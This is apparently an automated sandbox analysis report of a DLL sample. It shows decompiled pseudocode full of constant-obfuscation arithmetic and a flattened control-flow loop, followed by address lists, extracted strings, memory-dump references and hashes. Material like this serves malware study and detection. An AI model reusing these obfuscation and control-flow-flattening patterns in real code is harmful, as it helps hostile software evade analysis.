				_v292 = _v292 << 0x10;
				_v292 = _v292 << 0xe;
				_v292 = _v292 ^ 0xc0000000;
				_v216 = 0x258eaf;
				_v216 = _v216 * 0x48;
				_v216 = _v216 / _t819;
				_v216 = _v216 ^ 0x00c126f1;
				_v96 = 0xf75e54;
				_v96 = _v96 + 0xffff74b2;
				_v96 = _v96 ^ 0x00f6d306;
				_v268 = 0x92da;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 + 0x1646;
				_v268 = _v268 << 0xd;
				_v268 = _v268 ^ 0x02c9e000;
				_v196 = 0xf0429c;
				_t820 = 0x3d;
				_v196 = _v196 * 0x60;
				_v196 = _v196 >> 3;
				_v196 = _v196 ^ 0x0b431f50;
				_v232 = 0x6bfae5;
				_v232 = _v232 / _t820;
				_v232 = _v232 >> 4;
				_v232 = _v232 * 0x6e;
				_v232 = _v232 ^ 0x000c2b3c;
				_v40 = 0xa24143;
				_v40 = _v40 + 0xffff9191;
				_v40 = _v40 ^ 0x00a231cd;
				_v80 = 0x435983;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000556e3;
				_v180 = 0x94eafd;
				_v180 = _v180 + 0x1d08;
				_v180 = _v180 | 0xe944a694;
				_v180 = _v180 ^ 0xe9df3ebb;
				_v228 = 0xbcce84;
				_v228 = _v228 + 0xffff815d;
				_v228 = _v228 ^ 0xe4fbb881;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x0005fd7e;
				_v112 = 0x2fdad;
				_v112 = _v112 ^ 0x4ab81af1;
				_v112 = _v112 ^ 0x4abb9e1a;
				_v64 = 0x50dc85;
				_v64 = _v64 + 0xffff4d8c;
				_v64 = _v64 ^ 0x005cdb40;
				_v52 = 0x47f34d;
				_v52 = _v52 + 0xffff898a;
				_v52 = _v52 ^ 0x004c7feb;
				_v72 = 0xc369b0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 ^ 0x4c5d6799;
				_v132 = 0xe6e6b0;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 * 0x6c;
				_v132 = _v132 ^ 0x00059f00;
				_v172 = 0x544ea4;
				_v172 = _v172 << 5;
				_v172 = _v172 | 0xc018668b;
				_v172 = _v172 ^ 0xca962b34;
				_v148 = 0x61f17d;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 + 0xffff8980;
				_v148 = _v148 ^ 0xfffa8c30;
				_v100 = 0xf619bc;
				_v100 = _v100 >> 0xa;
				_v100 = _v100 ^ 0x00008a95;
				_v200 = 0xa94e7a;
				_v200 = _v200 + 0xa696;
				_v200 = _v200 + 0xffff4550;
				_v200 = _v200 ^ 0x00a03757;
				_v208 = 0x57e0ef;
				_v208 = _v208 ^ 0x592bbff9;
				_v208 = _v208 ^ 0x4b5d2b88;
				_v208 = _v208 ^ 0x1221726f;
				_v284 = 0x804076;
				_v284 = _v284 ^ 0x9dc3529f;
				_v284 = _v284 + 0x2ad8;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0xa19e17b3;
				_v176 = 0xb506b1;
				_v176 = _v176 | 0xc528794d;
				_v176 = _v176 + 0x810e;
				_v176 = _v176 ^ 0xc5bbfa9c;
				_v184 = 0x64408f;
				_v184 = _v184 << 3;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x00066ce1;
				_v252 = 0x9e8dfe;
				_v252 = _v252 | 0x2316ff28;
				_v252 = _v252 + 0xbb4b;
				_v252 = _v252 ^ 0x205df49d;
				_v252 = _v252 ^ 0x03c75996;
				_v192 = 0x20a385;
				_v192 = _v192 ^ 0x2edbbce0;
				_v192 = _v192 >> 5;
				_v192 = _v192 ^ 0x017066cd;
				_v312 = 0x989161;
				_v312 = _v312 + 0xa008;
				_v312 = _v312 + 0x4ac;
				_v312 = _v312 | 0x9f8d4417;
				_v312 = _v312 ^ 0x9f9ed397;
				_v320 = 0x6ba986;
				_t821 = 0x4d;
				_v320 = _v320 * 0x35;
				_v320 = _v320 + 0x6b8c;
				_v320 = _v320 + 0x347b;
				_v320 = _v320 ^ 0x164ad328;
				_v236 = 0xcaa528;
				_v236 = _v236 + 0x2035;
				_v236 = _v236 | 0x7bffa27f;
				_v236 = _v236 ^ 0x7bfdb1d6;
				_v276 = 0xb040eb;
				_v276 = _v276 * 0x3a;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00065548;
				_v280 = 0xf1680b;
				_v280 = _v280 >> 0xa;
				_v280 = _v280 >> 1;
				_v280 = _v280 >> 0xd;
				_v280 = _v280 ^ 0x00049c20;
				_v288 = 0x575f50;
				_v288 = _v288 << 0xe;
				_v288 = _v288 | 0xa77b0e2e;
				_v288 = _v288 * 0x52;
				_v288 = _v288 ^ 0x6fbbe03a;
				_v296 = 0x568d1e;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 >> 6;
				_v296 = _v296 >> 9;
				_v296 = _v296 ^ 0x0008fa1d;
				_v304 = 0xd1fef6;
				_v304 = _v304 << 0x10;
				_v304 = _v304 * 0x2d;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x7c01ef7f;
				_v92 = 0xea5a63;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x4b4e4928;
				_v76 = 0xf64e35;
				_v76 = _v76 + 0xbf9b;
				_v76 = _v76 ^ 0x00fbc5d2;
				_v248 = 0xc75c6;
				_v248 = _v248 ^ 0x54d7d0af;
				_v248 = _v248 / _t821;
				_v248 = _v248 | 0x9c98695d;
				_v248 = _v248 ^ 0x9d9ac3a5;
				_v256 = 0x504a74;
				_v256 = _v256 | 0x8719e45c;
				_v256 = _v256 * 0x7b;
				_v256 = _v256 ^ 0x8d2796a4;
				_v256 = _v256 ^ 0x85162cc6;
				_v84 = 0x519e4e;
				_v84 = _v84 ^ 0x8be7953d;
				_v84 = _v84 ^ 0x8bbbe938;
				_v168 = 0x311266;
				_v168 = _v168 ^ 0x18ab2cb8;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x3478f01c;
				_v60 = 0x61fbf7;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x000e504b;
				_v240 = 0xf8ae17;
				_v240 = _v240 >> 3;
				_v240 = _v240 | 0x050ada64;
				_v240 = _v240 ^ 0x567c7cbc;
				_v240 = _v240 ^ 0x53659cbf;
				_v68 = 0xee6d4a;
				_t374 =  &_v68; // 0xee6d4a
				_t822 = 0x49;
				_v68 =  *_t374 * 0xf;
				_v68 = _v68 ^ 0x0dff5dbc;
				_v300 = 0x550c32;
				_v300 = _v300 * 0x12;
				_v300 = _v300 + 0xffff8d7f;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x0bfb5da9;
				_v124 = 0x6baac1;
				_v124 = _v124 * 0x60;
				_t823 = 0x6f;
				_v124 = _v124 / _t822;
				_v124 = _v124 ^ 0x0084cf47;
				_v188 = 0xec1707;
				_v188 = _v188 << 0xc;
				_v188 = _v188 + 0x1505;
				_v188 = _v188 ^ 0xc1795754;
				_v244 = 0xd962f7;
				_v244 = _v244 + 0xffffa966;
				_v244 = _v244 | 0x93df07c8;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x49e87f80;
				_v48 = 0x35494e;
				_v48 = _v48 / _t823;
				_v48 = _v48 ^ 0x000830fa;
				_v88 = 0x633bdd;
				_v88 = _v88 + 0xc138;
				_v88 = _v88 ^ 0x006a2257;
				_v56 = 0x559d1c;
				_v56 = _v56 + 0xffff12d8;
				_v56 = _v56 ^ 0x005735ca;
				_v104 = 0xdd1aac;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0x0dd90d21;
				_v44 = 0x4278da;
				_t824 = 0x4e;
				_v44 = _v44 * 0x42;
				_v44 = _v44 ^ 0x112c636d;
				_v116 = 0x4ec2e;
				_v116 = _v116 + 0xffff43d8;
				_v116 = _v116 ^ 0x00065017;
				_v308 = 0xc5e4c2;
				_v308 = _v308 * 0x26;
				_v308 = _v308 + 0xa26d;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x25c4a583;
				_v36 = 0x60fc2;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x011987ae;
				_v140 = 0x8a5839;
				_v140 = _v140 << 0xb;
				_v140 = _v140 / _t824;
				_v140 = _v140 ^ 0x010a1534;
				_t814 = 0x30e419;
				_v204 = 0x180842;
				_v204 = _v204 ^ 0x577ac785;
				_v204 = _v204 + 0x1256;
				_v204 = _v204 ^ 0x5761cb73;
				_v136 = 0xcc77c3;
				_v136 = _v136 | 0x2e5c8e9b;
				_t825 = 0x3c;
				_v12 = 0xc2dfee2;
				_v16 = 0x8d06406;
				_v136 = _v136 * 0x19;
				_v136 = _v136 ^ 0x93985978;
				_v144 = 0xcb98e2;
				_v144 = _v144 ^ 0x2e2af391;
				_v144 = _v144 + 0xffff95d2;
				_v144 = _v144 ^ 0x2ee989ff;
				_v152 = 0x6e8dcb;
				_v152 = _v152 * 0x64;
				_v152 = _v152 ^ 0xf6de88b0;
				_v152 = _v152 ^ 0xddf9340f;
				_v160 = 0x1f41c3;
				_v160 = _v160 / _t825;
				_v160 = _v160 ^ 0x710c49d1;
				_v160 = _v160 ^ 0x7106b0fc;
				_v164 = 0xea0060;
				_v164 = _v164 << 2;
				_t826 = 0x54;
				_v164 = _v164 * 0x51;
				_v164 = _v164 ^ 0x2820691f;
				_v212 = 0x1a562c;
				_v212 = _v212 + 0xffff6884;
				_v212 = _v212 / _t826;
				_v212 = _v212 ^ 0x000ca439;
				_v316 = 0xc049a;
				_t827 = 0x4a;
				_v316 = _v316 / _t827;
				_v316 = _v316 >> 0xd;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x000978cf;
				_v120 = 0xbc159f;
				_t828 = 0x75;
				_v120 = _v120 * 0x6f;
				_t829 = 0x3acf932;
				_v120 = _v120 / _t828;
				_v120 = _v120 ^ 0x00bb77de;
				_v128 = 0x83c7e3;
				_v128 = _v128 ^ 0x1c1c3aef;
				_v128 = _v128 ^ 0x03a71d14;
				_v128 = _v128 ^ 0x1f3d9b10;
				while(1) {
					L1:
					while(1) {
						do {
							while(1) {
								L3:
								_t840 = _t740 - 0x6051746;
								if(_t840 <= 0) {
									break;
								}
								__eflags = _t740 - 0x644521d;
								if(_t740 == 0x644521d) {
									E00D512C1(_v32, _v136, _v144, _v152, _v160);
									_t740 = 0x4160ee8;
									goto L25;
								} else {
									__eflags = _t740 - 0x8d06406;
									if(_t740 == 0x8d06406) {
										_push(_t746);
										_push(_t746);
										_t715 = E00D3C5D8(_v20);
										_t746 = _v224;
										_t834 = _t834 + 0xc;
										__eflags = _t715;
										_v24 = _t715;
										_t798 = 0x26ffc0;
										_t740 =  !=  ? 0x26ffc0 : _t814;
										_t716 = 0x5dc2900;
										continue;
									} else {
										__eflags = _t740 - 0xa8b367c;
										if(__eflags == 0) {
											_t740 = 0x6051746;
											continue;
										} else {
											__eflags = _t740 - 0xc2dfee2;
											if(__eflags == 0) {
												_push(_v276);
												_push(_v236);
												_push(_v320);
												_t737 = E00D3F288(_v272, _v280, E00D4E1F8(0xd313f8, _v312, __eflags), _v288,  &_v8,  &_v20, _v296, 0xd313f8, _v304, _v28, _v92);
												_t834 = _t834 + 0x30;
												__eflags = _t737 - _v264;
												_t740 =  ==  ? _v16 : _t814;
												E00D4FECB(_t734, _v76, _v248, _v256, _v84);
												L16:
												_t829 = 0x3acf932;
												L25:
												_t746 = _v224;
												_t834 = _t834 + 0xc;
												_t798 = 0x26ffc0;
											}
											goto L26;
										}
									}
								}
								L29:
								return _t832;
							}
							if(_t840 == 0) {
								_push(_v228);
								_push(_v180);
								_push(_v80);
								_t717 = E00D4E1F8(0xd313a8, _v40, __eflags);
								_push(_v72);
								_push(_v52);
								_push(_v64);
								__eflags = E00D3738A(_v132, _t717, _v172, _v108,  &_v28, E00D4E1F8(0xd31318, _v112, __eflags), _v148) - _v220;
								_t740 =  ==  ? _v12 : 0x1841daf;
								E00D4FECB(_t717, _v100, _v200, _v208, _v284);
								_t834 = _t834 + 0x38;
								E00D4FECB(_t718, _v176, _v184, _v252, _v192);
								_t814 = 0x30e419;
								goto L16;
							} else {
								if(_t740 == _t798) {
									_t725 = E00D31BC9(_v260, _v28, _v300, _v124, _v20, _v188, _v244, _v156, _v24,  &_v32, _v48, _v88);
									_t834 = _t834 + 0x2c;
									__eflags = _t725 - _v292;
									_t746 = _v224;
									_t716 = 0x5dc2900;
									_t740 =  ==  ? 0x5dc2900 : 0x4160ee8;
									goto L3;
								} else {
									if(_t740 == _t814) {
										E00D3F7FE(_v120, _v28, _v128, _v232);
									} else {
										if(_t740 == _t829) {
											_t729 = E00D322C9(_v308, _v36, _v32, 0x20, _a20, _v140, _v204, _v268);
											_t834 = _t834 + 0x18;
											_t740 = 0x644521d;
											__eflags = _t729 - _v196;
											_t832 =  ==  ? 1 : _t832;
											goto L11;
										} else {
											if(_t740 == 0x4160ee8) {
												E00D52B09(_v164, _v24, _v212, _v316);
												_t740 = _t814;
												goto L11;
											} else {
												if(_t740 != _t716) {
													goto L26;
												} else {
													E00D4CBE9(_v216, _a12, _v56, _t746, _v104, _v44, _v116, _v32);
													_t834 = _t834 + 0x18;
													_t740 =  ==  ? _t829 : 0x644521d;
													L11:
													_t746 = _v224;
													goto L1;
												}
											}
										}
									}
								}
							}
							goto L29;
							L26:
							__eflags = _t740 - 0x1841daf;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}

0x00d357c2
0x00d357c9
0x00d357cb
0x00d357d2
0x00d357d6
0x00d357dd
0x00d357e4
0x00d357eb
0x00d357f2
0x00d357f3
0x00d357f5
0x00d357fa
0x00d35805
0x00d35811
0x00d35813
0x00d3581a
0x00d3581f
0x00d35828
0x00d35833
0x00d3583b
0x00d35843
0x00d35848
0x00d35850
0x00d35858
0x00d35865
0x00d35868
0x00d3586c
0x00d35871
0x00d35879
0x00d35889
0x00d3588d
0x00d3589a
0x00d3589d
0x00d358a1
0x00d358a9
0x00d358b9
0x00d358bd
0x00d358c2
0x00d358c7
0x00d358cf
0x00d358da
0x00d358ea
0x00d358eb
0x00d358f2
0x00d358fd
0x00d35905
0x00d3590d
0x00d35912
0x00d35917
0x00d3591f
0x00d3592c
0x00d35936
0x00d3593a
0x00d35942
0x00d3594d
0x00d35958
0x00d35963
0x00d3596b
0x00d35972
0x00d3597a
0x00d3597f
0x00d35987
0x00d3599c
0x00d3599d
0x00d359a4
0x00d359ac
0x00d359b7
0x00d359c5
0x00d359c9
0x00d359d3
0x00d359d7
0x00d359df
0x00d359ea
0x00d359f5
0x00d35a00
0x00d35a0b
0x00d35a13
0x00d35a1e
0x00d35a29
0x00d35a34
0x00d35a3f
0x00d35a4a
0x00d35a52
0x00d35a5a
0x00d35a62
0x00d35a67
0x00d35a6f
0x00d35a7a
0x00d35a85
0x00d35a90
0x00d35a9b
0x00d35aa6
0x00d35ab1
0x00d35abc
0x00d35ac7
0x00d35ad2
0x00d35ae5
0x00d35aec
0x00d35af7
0x00d35b02
0x00d35b12
0x00d35b19
0x00d35b24
0x00d35b2f
0x00d35b37
0x00d35b42
0x00d35b4d
0x00d35b58
0x00d35b60
0x00d35b6b
0x00d35b76
0x00d35b81
0x00d35b89
0x00d35b94
0x00d35b9f
0x00d35baa
0x00d35bb5
0x00d35bc0
0x00d35bcb
0x00d35bd6
0x00d35be1
0x00d35bec
0x00d35bf4
0x00d35bfc
0x00d35c04
0x00d35c09
0x00d35c11
0x00d35c1c
0x00d35c27
0x00d35c32
0x00d35c3d
0x00d35c4a
0x00d35c52
0x00d35c5a
0x00d35c65
0x00d35c6d
0x00d35c75
0x00d35c7d
0x00d35c85
0x00d35c8d
0x00d35c98
0x00d35ca3
0x00d35cab
0x00d35cb6
0x00d35cbe
0x00d35cc6
0x00d35cce
0x00d35cd6
0x00d35cde
0x00d35ced
0x00d35cee
0x00d35cf2
0x00d35cfa
0x00d35d02
0x00d35d0a
0x00d35d12
0x00d35d1a
0x00d35d22
0x00d35d2a
0x00d35d37
0x00d35d3b
0x00d35d40
0x00d35d45
0x00d35d4d
0x00d35d55
0x00d35d5a
0x00d35d5e
0x00d35d63
0x00d35d6b
0x00d35d73
0x00d35d78
0x00d35d85
0x00d35d89
0x00d35d91
0x00d35d99
0x00d35d9e
0x00d35da3
0x00d35da8
0x00d35db0
0x00d35db8
0x00d35dc2
0x00d35dc6
0x00d35dcb
0x00d35dd3
0x00d35dde
0x00d35de6
0x00d35df1
0x00d35dfc
0x00d35e07
0x00d35e12
0x00d35e1a
0x00d35e28
0x00d35e2c
0x00d35e34
0x00d35e3c
0x00d35e44
0x00d35e51
0x00d35e55
0x00d35e5d
0x00d35e65
0x00d35e70
0x00d35e7b
0x00d35e86
0x00d35e93
0x00d35e9e
0x00d35ea6
0x00d35eb1
0x00d35ebc
0x00d35ec4
0x00d35ecf
0x00d35ed7
0x00d35edc
0x00d35ee4
0x00d35eec
0x00d35ef4
0x00d35eff
0x00d35f09
0x00d35f0c
0x00d35f13
0x00d35f1e
0x00d35f2b
0x00d35f2f
0x00d35f37
0x00d35f3b
0x00d35f43
0x00d35f56
0x00d35f66
0x00d35f67
0x00d35f70
0x00d35f7b
0x00d35f86
0x00d35f8e
0x00d35f99
0x00d35fa4
0x00d35fac
0x00d35fb4
0x00d35fbc
0x00d35fc0
0x00d35fc8
0x00d35fde
0x00d35fe5
0x00d35ff0
0x00d35ffb
0x00d36006
0x00d36011
0x00d3601c
0x00d36027
0x00d36032
0x00d3603d
0x00d36045
0x00d36050
0x00d36063
0x00d36064
0x00d3606b
0x00d36076
0x00d36081
0x00d3608c
0x00d36097
0x00d360a4
0x00d360a8
0x00d360b0
0x00d360b5
0x00d360bd
0x00d360d0
0x00d360d7
0x00d360e2
0x00d360ed
0x00d36102
0x00d3610b
0x00d36116
0x00d3611b
0x00d36126
0x00d36131
0x00d3613c
0x00d36147
0x00d36152
0x00d36165
0x00d36168
0x00d36173
0x00d3617e
0x00d36185
0x00d36190
0x00d3619b
0x00d361a6
0x00d361b1
0x00d361bc
0x00d361cf
0x00d361d6
0x00d361e1
0x00d361ec
0x00d36202
0x00d36209
0x00d36214
0x00d3621f
0x00d3622a
0x00d3623a
0x00d3623d
0x00d36244
0x00d3624f
0x00d3625a
0x00d36270
0x00d36277
0x00d36282
0x00d3628e
0x00d36293
0x00d36299
0x00d3629e
0x00d362a3
0x00d362ab
0x00d362be
0x00d362bf
0x00d362cf
0x00d362d4
0x00d362db
0x00d362e6
0x00d362f1
0x00d362fc
0x00d36307
0x00d36312
0x00d36312
0x00d36317
0x00d3631c
0x00d3631c
0x00d3631c
0x00d3631c
0x00d36322
0x00000000
0x00000000
0x00d36578
0x00d3657e
0x00d366b2
0x00d366b7
0x00000000
0x00d36584
0x00d36584
0x00d3658a
0x00d3665a
0x00d3665b
0x00d36663
0x00d36668
0x00d3666f
0x00d36672
0x00d36674
0x00d3667d
0x00d36682
0x00d36685
0x00000000
0x00d36590
0x00d36590
0x00d36596
0x00d36637
0x00000000
0x00d3659c
0x00d3659c
0x00d365a2
0x00d365a8
0x00d365b1
0x00d365b5
0x00d365fb
0x00d36600
0x00d3660b
0x00d36616
0x00d3662d
0x00d3656e
0x00d3656e
0x00d366bc
0x00d366bc
0x00d366c3
0x00d366cb
0x00d366cb
0x00000000
0x00d365a2
0x00d36596
0x00d3658a
0x00d36700
0x00d3670a
0x00d3670a
0x00d36328
0x00d3648f
0x00d36498
0x00d3649f
0x00d364ad
0x00d364bc
0x00d364c3
0x00d364ca
0x00d3651c
0x00d36524
0x00d36541
0x00d36546
0x00d36564
0x00d36569
0x00000000
0x00d3632e
0x00d36330
0x00d36469
0x00d36470
0x00d3647c
0x00d3647e
0x00d36482
0x00d36487
0x00000000
0x00d36336
0x00d36338
0x00d366f7
0x00d3633e
0x00d36340
0x00d363fd
0x00d3640e
0x00d36411
0x00d36416
0x00d36418
0x00000000
0x00d36346
0x00d3634c
0x00d363c5
0x00d363cc
0x00000000
0x00d3634e
0x00d36350
0x00000000
0x00d36356
0x00d36388
0x00d3638f
0x00d363a0
0x00d363a3
0x00d363a3
0x00000000
0x00d363a3
0x00d36350
0x00d3634c
0x00d36340
0x00d36338
0x00d36330
0x00000000
0x00d366d0
0x00d366d0
0x00d366d0
0x00000000
0x00d366dc
0x00d36317

Strings

2G, xrefs: 00D35905
NI5, xrefs: 00D35FC8
{4, xrefs: 00D35CFA
W, xrefs: 00D35BC0
`, xrefs: 00D3621F
5 , xrefs: 00D35D12
(INK, xrefs: 00D35DE6
P_W, xrefs: 00D35D6B
Jm, xrefs: 00D35EFF
W"j, xrefs: 00D36006
tJP, xrefs: 00D35E3C

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
API String ID: 0-4122124823
Opcode ID: 5b1ac6ccd012be82a1e3ecbed1080939e9af79e45e3b6fac75bfcb8b6f447048
Instruction ID: 4f2ea24ea133001ecc649f6fd4034739cb34ce15d9f08469dc8fe63a64325d16
Opcode Fuzzy Hash: 5b1ac6ccd012be82a1e3ecbed1080939e9af79e45e3b6fac75bfcb8b6f447048
Instruction Fuzzy Hash: 5772FD715093809FD3B9CF65C98AB8FBBE1BBC4304F108A1DE2DA86260D7B18559CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D3D14C, Relevance: 14.1, Strings: 11, Instructions: 385
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00D3D14C() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t429;
				intOrPtr _t432;
				intOrPtr _t436;
				signed int _t440;
				void* _t441;
				void* _t459;
				signed int _t468;
				intOrPtr _t469;
				intOrPtr* _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int* _t477;
				void* _t480;

				_t477 =  &_v1756;
				_v1600 = 0x9247ff;
				_t441 = 0xcb67425;
				_v1600 = _v1600 + 0x9ce;
				_v1600 = _v1600 ^ 0x009251e4;
				_v1720 = 0x31cc78;
				_v1720 = _v1720 ^ 0xe44f8b4e;
				_v1720 = _v1720 | 0xfbe7febf;
				_v1720 = _v1720 ^ 0xfff0ff80;
				_v1612 = 0x6730db;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0xcc36c002;
				_v1668 = 0x7fe6a4;
				_v1668 = _v1668 + 0xffff1494;
				_v1668 = _v1668 ^ 0x091c946b;
				_v1668 = _v1668 ^ 0x09626f51;
				_v1756 = 0x73e886;
				_v1756 = _v1756 | 0xafbdbbdf;
				_v1756 = _v1756 + 0xfe30;
				_v1756 = _v1756 ^ 0xb000fa0f;
				_v1604 = 0x468da6;
				_v1604 = _v1604 + 0xffffc3ca;
				_v1604 = _v1604 ^ 0x00465160;
				_v1592 = 0xd4519;
				_v1592 = _v1592 + 0x934d;
				_v1592 = _v1592 ^ 0x0004ddfc;
				_v1640 = 0x8a1a75;
				_v1640 = _v1640 + 0x87da;
				_v1640 = _v1640 + 0xaa53;
				_v1640 = _v1640 ^ 0x008e8924;
				_v1648 = 0xe80c10;
				_v1648 = _v1648 ^ 0x90af551f;
				_v1648 = _v1648 + 0x6d6d;
				_v1648 = _v1648 ^ 0x90403b69;
				_v1712 = 0x809df1;
				_v1712 = _v1712 << 2;
				_v1712 = _v1712 << 7;
				_v1576 = _v1576 & 0x00000000;
				_v1712 = _v1712 * 0x69;
				_v1712 = _v1712 ^ 0x81832f4f;
				_v1656 = 0xe952a2;
				_v1656 = _v1656 | 0x54fcc54b;
				_v1656 = _v1656 + 0xffff1739;
				_v1656 = _v1656 ^ 0x54fad21b;
				_v1700 = 0xbcdb1b;
				_v1700 = _v1700 + 0xdccd;
				_v1700 = _v1700 + 0xffffcf6f;
				_v1700 = _v1700 ^ 0x00b72c28;
				_v1628 = 0x5c7dad;
				_v1628 = _v1628 >> 5;
				_v1628 = _v1628 + 0x3d87;
				_v1628 = _v1628 ^ 0x000cf9b2;
				_v1660 = 0x2281c9;
				_v1660 = _v1660 * 0x49;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x004fb411;
				_v1568 = 0xcd133d;
				_v1568 = _v1568 * 0x4e;
				_v1568 = _v1568 ^ 0x3e7dd872;
				_v1672 = 0x86c6ca;
				_v1672 = _v1672 * 0x5f;
				_v1672 = _v1672 + 0xffff3952;
				_v1672 = _v1672 ^ 0x3200c70e;
				_v1588 = 0x24e2cc;
				_v1588 = _v1588 | 0xcf150453;
				_v1588 = _v1588 ^ 0xcf3ce5d0;
				_v1572 = 0x6249a8;
				_v1572 = _v1572 << 6;
				_v1572 = _v1572 ^ 0x189f8b0c;
				_v1596 = 0x119a44;
				_v1596 = _v1596 >> 8;
				_v1596 = _v1596 ^ 0x000b5fad;
				_v1680 = 0xd16cc2;
				_v1680 = _v1680 ^ 0x4916a611;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 ^ 0x00055714;
				_v1728 = 0x441d3d;
				_t471 = 0x35;
				_v1728 = _v1728 * 3;
				_v1728 = _v1728 << 3;
				_v1728 = _v1728 | 0x559f2c94;
				_v1728 = _v1728 ^ 0x57fdad3a;
				_v1564 = 0xb1e813;
				_v1564 = _v1564 >> 0xc;
				_v1564 = _v1564 ^ 0x0004104c;
				_v1736 = 0x70197f;
				_v1736 = _v1736 >> 0x10;
				_v1736 = _v1736 + 0xe51d;
				_v1736 = _v1736 * 0x61;
				_v1736 = _v1736 ^ 0x00557f63;
				_v1744 = 0x5ff0e3;
				_v1744 = _v1744 + 0xffff2d97;
				_v1744 = _v1744 + 0xffff9c65;
				_v1744 = _v1744 ^ 0xd07f01de;
				_v1744 = _v1744 ^ 0xd026cc62;
				_v1608 = 0x914f5e;
				_v1608 = _v1608 << 0xf;
				_v1608 = _v1608 ^ 0xa7adba7a;
				_v1664 = 0xe3376f;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 ^ 0x000bcae6;
				_v1616 = 0x54b2fb;
				_v1616 = _v1616 + 0xce1d;
				_v1616 = _v1616 ^ 0x005b3b7b;
				_v1644 = 0xe2ce3f;
				_v1644 = _v1644 + 0x16f2;
				_v1644 = _v1644 >> 0xd;
				_v1644 = _v1644 ^ 0x000e1e70;
				_v1752 = 0x7f4aca;
				_v1752 = _v1752 ^ 0x883f1d9d;
				_v1752 = _v1752 + 0x59a5;
				_v1752 = _v1752 | 0x80ddc91b;
				_v1752 = _v1752 ^ 0x88d3833c;
				_v1636 = 0xc2c2cf;
				_v1636 = _v1636 / _t471;
				_v1636 = _v1636 + 0xffff5d17;
				_v1636 = _v1636 ^ 0x0005a2c5;
				_v1676 = 0x4604e2;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 + 0xdac5;
				_v1676 = _v1676 ^ 0x2048b942;
				_v1652 = 0x890d36;
				_v1652 = _v1652 >> 3;
				_v1652 = _v1652 | 0xfe9d52c1;
				_v1652 = _v1652 ^ 0xfe9ab4fb;
				_v1684 = 0xd96cde;
				_v1684 = _v1684 * 0x47;
				_v1684 = _v1684 + 0xffff480a;
				_v1684 = _v1684 ^ 0x3c48c040;
				_v1624 = 0xc48732;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x01665cbd;
				_v1624 = _v1624 ^ 0x016df620;
				_v1692 = 0x58f5b8;
				_v1692 = _v1692 << 4;
				_v1692 = _v1692 ^ 0x299232ca;
				_v1692 = _v1692 ^ 0x2c1b7361;
				_v1732 = 0x9987b4;
				_v1732 = _v1732 << 4;
				_v1732 = _v1732 ^ 0x14505727;
				_v1732 = _v1732 | 0xbadb6758;
				_v1732 = _v1732 ^ 0xbfd57076;
				_v1708 = 0x151e5;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 >> 0xe;
				_v1708 = _v1708 + 0xffff12c7;
				_v1708 = _v1708 ^ 0xffff0a0d;
				_v1580 = 0x15a9fb;
				_v1580 = _v1580 >> 6;
				_v1580 = _v1580 ^ 0x0004a695;
				_v1688 = 0x871746;
				_t472 = 0x34;
				_v1688 = _v1688 / _t472;
				_v1688 = _v1688 + 0xffff07ae;
				_v1688 = _v1688 ^ 0x00087c5e;
				_v1740 = 0xe3d16b;
				_v1740 = _v1740 << 7;
				_v1740 = _v1740 | 0x6cb9ee1d;
